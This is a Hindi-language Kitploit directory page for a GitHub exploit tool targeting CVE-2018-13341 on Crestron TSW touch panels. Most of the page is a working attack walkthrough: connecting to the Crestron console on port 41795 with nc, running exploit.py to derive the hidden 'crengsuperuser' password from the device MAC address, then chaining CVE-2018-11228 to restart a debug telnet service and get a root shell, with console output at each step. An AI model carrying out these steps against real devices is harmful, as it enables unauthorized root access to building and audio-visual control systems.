Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2018-13341 — यह उपकरण CVE-2018-13341 का शोषण करने का लक्ष्य रखता है। | Kitploit
उपकरण/GitHubGitHub/rajchowdhury240/cve-2018-13341
एम्बेडेड सिस्टम सुरक्षापासवर्ड हमलेभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणहार्डवेयर और IoT सुरक्षा
GitHubrajchowdhury240/cve-2018-13341

CVE-2018-13341

यह उपकरण CVE-2018-13341 का शोषण करने का लक्ष्य रखता है।

रिपॉजिटरी देखें
35 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2018-13341

यह उपकरण CVE-2018-13341 का शोषण करने का लक्ष्य रखता है। लक्षित उपकरण के MAC पते का उपयोग करके, आप "crengsuperuser" छिपे खाते का पासवर्ड प्राप्त कर सकते हैं जिसके पास उन्नत विशेषाधिकार हैं और आपको SUDO कमांड चलाने की अनुमति देता है।

TSW-XX60 उपकरण पर पोर्ट 41795 तक पहुँच कर Crestron Toolbox Protocol (CTP) से जुड़ा जा सकता है।

root@kitploit:~
# nc -C w.x.y.z 41795
TSW-760 Control Console

TSW-760> estat

The EST command has been made obsolete. Please use IPCONFIG instead.
Ethernet Adapter [XYZ]:
	Link Status ....... : OK
	DHCP .............. : ON
	MAC Address ....... : 00.XX.XX.XX.XX.XX
	IP Address ........ : [removed]
	Subnet Mask ....... : [removed]
	IPV6 Address ...... : [removed]
	Default Gateway ... : [removed]


	DNS Servers ........ : [removed]    | DHCP      |
	                       [removed]    | DHCP      |

आवश्यकताएँ

इस उपकरण के लिए CryptoGraphy मॉड्यूल आवश्यक है।

root@kitploit:~
# pip3 install cryptography

या

root@kitploit:~
# pip3 install -r requirements.txt

आरंभ करना

root@kitploit:~
usage: exploit.py [-h] [-m MAC]


# Example
# python3 exploit.py -m aabbccddeeff
[*] Device MAC address: AAXXYYZZ
[*] Password for 'crengsuperuser': somerandompass

CVE-2018-11228 का शोषण

CVE-2018-11228 Crestron Terminal Protocol (CTP) में Bash Shell Service के माध्यम से प्रमाणीकरण रहित RCE की अनुमति देता है। "crengsuperuser" छिपे खाते का पासवर्ड प्राप्त करने के बाद आप मशीन पर root पहुँच प्राप्त कर सकते हैं।

root@kitploit:~
# nc -C w.x.y.z 41795

TSW-760 Control Console

TSW-760> TELNETPORT OFF
Telnet Port: Off
TSW-760> SUDO RESTARTSERVICE telnetd_debug
Username: crengsuperuser
Password: **************

Service telnetd_debug restarted

TSW-760>

फिर, एक नए शेल में, आप बॉक्स पर root पहुँच प्राप्त कर सकते हैं।

root@kitploit:~
# telnet w.x.y.z

bash# whoami
root
root@kitploit:~
Credit Goes to : axcheron 
टूल डाउनलोड करें